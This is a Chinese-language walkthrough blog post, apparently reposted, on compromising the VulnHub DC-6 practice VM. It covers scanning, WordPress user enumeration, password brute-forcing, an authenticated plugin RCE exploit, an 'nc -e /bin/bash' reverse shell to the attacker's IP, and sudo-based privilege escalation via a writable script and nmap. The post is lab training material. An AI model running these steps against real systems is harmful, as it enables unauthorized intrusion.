1. Toy模板网首页
  2. > Toy博客

vulnhub-DC-6

9月前 作者:rightevil 分类:Toy博客 阅读(28) 违法举报

这篇具有很好参考价值的文章主要介绍了vulnhub-DC-6。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

🖳 主机发现

sudo netdiscover -i eth0 -r 192.168.1.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                     
                                                                                                   
 21 Captured ARP Req/Rep packets, from 6 hosts.   Total size: 1260                                 
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------                                
 192.168.1.5     20:1e:88:ad:fc:55      1      60  Intel Corporate                                 
 192.168.1.14    08:00:27:e2:b6:88      1      60  PCS Systemtechnik GmbH                          
 192.168.1.3     a2:86:90:e6:04:98      1      60  Unknown vendor

目标是192.168.1.14

👁 服务扫描

# Nmap 7.94SVN scan initiated Fri Feb 16 15:50:20 2024 as: nmap -p- -oN nmap_scan -sV -sC --min-rate 5000 192.168.1.14
Nmap scan report for 192.168.1.14 (192.168.1.14)
Host is up (0.0016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Did not follow redirect to http://wordy/
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 08:00:27:E2:B6:88 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb 16 15:50:28 2024 -- 1 IP address (1 host up) scanned in 8.69 seconds

发现重定向到http://wordy/这个网站,我们把它加入hosts文件中
发现主页是一个wordpress网站,对其进行扫描

wpscan -e vt,vp,u --url http://wordy/
[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

发现了很多用户,记录下来,然后尝试一下登录界面的弱口令,没有试出弱口令,那就尝试爆破,因为爆破路径也没有什么有趣的,那攻击向量只有web喝ssh,web又只有这个登录页面是暴露的。
根据作者的提示,生成一下密码字典

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

尝试爆破

wpscan --url http://wordy -U users -P passwords.txt

得到了凭证

mark:helpdesk01

🚪🚶 获取权限

登录上之后,发现有一个Activity Monitor,搜索一下有没有漏洞

searchsploit Activity
···
WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection                                                | php/webapps/45274.html
WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)                                  | php/webapps/50110.py
···

我们使用下面那个,执行之后输入ip,username,password,然后用nc反弹shell。

nc -e /bin/bash 192.168.1.13 443

🛡️ 提升权限

用linpeas.sh辅助提权脚本枚举信息

这里有俩个有趣的文件,我们可以在things-to-do.txt中发现用户gaham的凭证

我们用ssh登录上去,后进行一些枚举,发现可以以jens身份运行backups.sh脚本,且因为gaham用户是devs组,对该脚本有修改权限,我们可以在里面加一个/bin/bash来启动一个jens用户的shell

sudo -u jens ./backups.sh

或者jens的shell后,再次使用sudo -l进行检查

然后在GTFOBins搜索nmap
https://gtfobins.github.io/gtfobins/nmap/#sudo
最终拿到root的shell

📖 推荐文章

DC-6下载地址
DC-6国外大佬walkthrough文章
GTFOBins地址
个人博客地址文章来源地址https://www.toymoban.com/news/detail-825311.html

到了这里,关于vulnhub-DC-6的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

  • [Vulnhub靶机] DC-1

    [Vulnhub靶机] DC-1

    [Vulnhub靶机] DC-1靶机渗透思路及方法(个人分享) 靶机下载地址: https://download.vulnhub.com/dc/DC-1.zip 靶机地址:192.168.67.28 攻击机地址:192.168.67.3 1.使用 arp-scan 命令扫描网段内存活的主机,以获取靶机ip地址 arp-scan -I 指定网卡 -l 2.使用  nmap  工具扫描靶机开放端口、服务版本

    2024年01月20日
    浏览(109)
  • [vulnhub]DC2

    [vulnhub]DC2

    信息收集 扫ip,有两种方式: arp 、 nmap 192.168.56.137 扫端口: flag1 我们使用浏览器登录80端口,发现登录不上,地址栏变为: http://dc-2 原因是dns解析不正确,我们需要在 hosts 文件中添加: 访问可以获得flag1 提示我们需要使用工具 cewl 获得字典,登录来获得flag2 flag2 cewl 首先需

    2024年02月15日
    浏览(32)
  • vulnhub靶场之DC-2

    vulnhub靶场之DC-2

    与DC-1非常相似,DC-2是另一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。 与最初的DC-1一样,它的设计考虑到了初学者。 Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。 就像DC-1一样,有五个标志,包括最后一个

    2024年01月22日
    浏览(39)
  • Vulnhub靶场DC-1练习

    Vulnhub靶场DC-1练习

    下载链接:https://download.vulnhub.com/dc/DC-1.zip 介绍:There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this, however, you will require root privileges.(一共有五个flags,最终目标是进入root用户的目录。) 启动以后如下图: 将

    2023年04月11日
    浏览(33)
  • vulnhub靶场之DC-9

    vulnhub靶场之DC-9

    只有一个flag 虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.52.0/24 目标就是我们搭建的靶场,靶场IP为:192.168.52.0/24 (1)寻找靶场真实ip 靶场的真实ip地址是192.168.52.131 (2)探测端口及服务 注意到ssh服务端口是filtered的,可能是因为什么原因关闭了 也

    2024年01月16日
    浏览(34)
  • vulnhub DC:3.2渗透笔记

    vulnhub DC:3.2渗透笔记

    kali ip :192.168.20.130 靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/ 信息收集 扫描靶机ip以及开放端口 开放了80端口访问一下 意思就是需要root权限了 查看Wapplayzer信息如下 使用的Joomla的CMS,使用joomscan(Joomla漏洞扫描器)扫描器扫描 后台登录界面已发现 漏洞攻击 使用searchsploit搜索

    2023年04月24日
    浏览(33)
  • Vulnhub靶机渗透学习——DC-9

    Vulnhub靶机渗透学习——DC-9

    本文仅个人学习所做笔记,仅供参考,有不足之处请指出! vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC9 还是老样子只有拿到root权限才可以发现

    2024年02月09日
    浏览(43)
  • vulnhub练习 DC-1复现及分析

    vulnhub练习 DC-1复现及分析

    靶机:DC-1 192.168.200.17 攻击机:kali 192.168.200.13 攻击机和靶机的网络连接方式要相同,另外DC-1的网络连接方式我这里采用NAT模式,是与kali的网络连接模式相同的(当然亦可以选用桥接模式) DC-1网络设计 点击高级后可以查看DC-1的靶机MAC地址,便于扫描IP时识别 KALI网络设计 根

    2024年02月21日
    浏览(37)
  • DC系列 DC:2

    DC系列 DC:2

    IP收集 使用arp-scan 对网段进行扫描 得到目标机ip之后使用nmap -A -p- -sV -sT 10.4.7.21对该ip进行详细扫描 可以看到该目标机开放着ssh和http服务得到端口7744和80 网页收集 访问网页发现无法访问 应该是被重定向到了dc-2这个域名我们做个域名绑定修改本地hosts文件C:WindowsSystem32driv

    2024年02月06日
    浏览(43)
  • 【DC渗透系列DC-4】

    【DC渗透系列DC-4】

    一开始想到sql注入但是没有找到注入点 抓包后送到intruder进行爆破用户admin得到密码happy 点击commad后发现可能存在任意命令执行漏洞 抓个包,发现ls -l命令是radio参数后的值 改成pwd后放包试试 存在漏洞,有远程代码执行漏洞 可以利用此漏洞进行反弹shell 在home里发现三个人物

    2024年02月19日
    浏览(32)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包